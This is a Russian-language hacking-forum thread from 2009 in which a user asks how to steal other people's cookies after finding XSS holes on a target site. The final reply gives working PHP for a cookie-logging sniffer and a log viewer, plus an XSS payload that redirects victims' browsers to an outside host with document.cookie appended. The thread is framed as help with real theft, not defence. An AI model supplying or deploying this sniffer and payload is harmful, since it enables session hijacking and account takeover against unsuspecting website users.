Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Куки (https://forum.antichat.xyz/showthread.php?t=129457)

Badak 12.07.2009 16:58
Куки
 
Все доброго времени суток.Ребята,подскажите как мне чужие куки забирать.Заранее спасибо

Badak 12.07.2009 17:19
Я нашел XSS,что дальше?:Р

Inotsee 12.07.2009 17:24
Издеваешься? Знаешь как найти XSS и не знаешь как запрос составить? Составь запрос, дай жертве ссылку и лови его куки на сниффере.

Badak 12.07.2009 17:26
Я не издеваюсь))Я знаю как XSS найти уже на нужном сайте нашел 23,а как запрос составить и что дальше делать понятия не имею,но хочу научиться

br3k 12.07.2009 17:30
XSS
_ttp://hackzona.ru/hz.php?name=News&file=article&sid=5005
_ttp://www.cgisecurity.com/articles/dx27.html
_ttp://ha.ckers.org/xss.html
_ttp://forum.antichat.ru/thread20140.html
_ttp://forum.antichat.ru/thread8038.html
_ttp://forum.antichat.ru/thread7124-XSS+FAQ.html
К изучению.

Aikaram 12.07.2009 17:32
иди лучше книжки почитай, которые на лето задали. а то все куки да куки.

Badak 12.07.2009 17:35
Тебе выдали ты иди и читай

Badak 12.07.2009 18:40
Может мне кто-то ответить?!Что делать после того как нашел XSS?

Flegmatique 12.07.2009 18:43
ссылки тебе дали, читай и действуй
жевать за тебя никто не будет

Failure 12.07.2009 19:18
sniff.php
PHP код:
<?php
$ip=$_SERVER["REMOTE_ADDR"];
$ref=$_SERVER["HTTP_REFERER"];
$ua=$_SERVER["HTTP_USER_AGENT"];
$q=$_SERVER["QUERY_STRING"];
if($ref == "") {
$str "<b>$ip</b>  | Нет HTTP реферера | <br>Юзает: $ua |<br>QUERY_STRING: $q |<br>======================================================================================================";
}
else {$str "<b>$ip</b>  | Пришел с :  <a href=$ref>$ref</a> | <br>Юзает: $ua |<br>QUERY_STRING:   $q   |<br>======================================================================================================";}

$file=fopen("log.txt","a+");
fwrite($file,"$str<br>");
fclose($file);
?>
<img src="http://img1.liveinternet.ru/images/attach/b/3/28/251/28251827_novoe.jpg">
log.php:
PHP код:
<?php
echo "<html>
<body>
<meta http-equiv; charset=windows-1251>
<title>WEB Sniffer</title>
<body bgcolor=black style=color:red>
<h1>WEB SNIFFER</h1>
<input type=submit value='Обновить' onClick=javascript:window.location='log.php'>
</form>
<br><br><br>
======================================================================================================<br>";
if(file_exists("log.txt"))
require "log.txt";
echo "<br></body></html>";
?>
http://site.ru/folder/[XSS]="><script>window.location='http://sniff.ru/sniff.php?'+document.cookie;</script>


Время: 06:15
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице